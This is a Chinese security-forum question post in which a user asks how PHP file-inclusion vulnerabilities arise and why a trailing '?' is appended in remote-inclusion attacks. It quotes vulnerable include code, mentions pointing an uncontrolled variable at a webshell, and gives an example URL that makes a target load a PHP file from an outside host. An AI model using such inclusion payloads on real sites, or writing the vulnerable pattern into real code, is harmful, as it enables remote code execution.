[讨论]php文件包含的问题

php, 文件, 讨论

[讨论]php文件包含的问题
议题作者：消失再消失
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

老是弄不懂这种漏洞是怎么来的，网上的包含漏洞介绍大约都是这样一段代码：
....
$id=$_GET["id"];
include($id);
....
因为变量id能被人为任意控制，所以造成了包含漏洞。
这里很容易理解。

但是看别人发布的文件包含漏洞是基本是这样类型的代码：
....
include_once $edp_relative_path."admin/serverdata.php";
....
只要向变量edp_relative_path提交一个webshell的地址，就能执行webshell了。
这里就不明白了，edp_relative_path这个变量是怎么来的？为什么可以人为控制？
我找了很久关于edp_relative_path这个变量的代码，都没有发现是哪里赋的值。

还有就是，为什么有些远程包含漏洞在包含了文件之后还要加一个“?”啊？如“http://www.bajinzhi.net/l.php?i=http://bbb.com/love.php?”

请高人指点啊小鸡鸡重出江湖了~~！！
帖子119 精华0 积分3244 阅读权限100 性别男在线时间143 小时注册时间2007-7-31 最后登录2008-7-18 查看详细资料报告 TOP 让女孩一夜变的更有女人味

dingking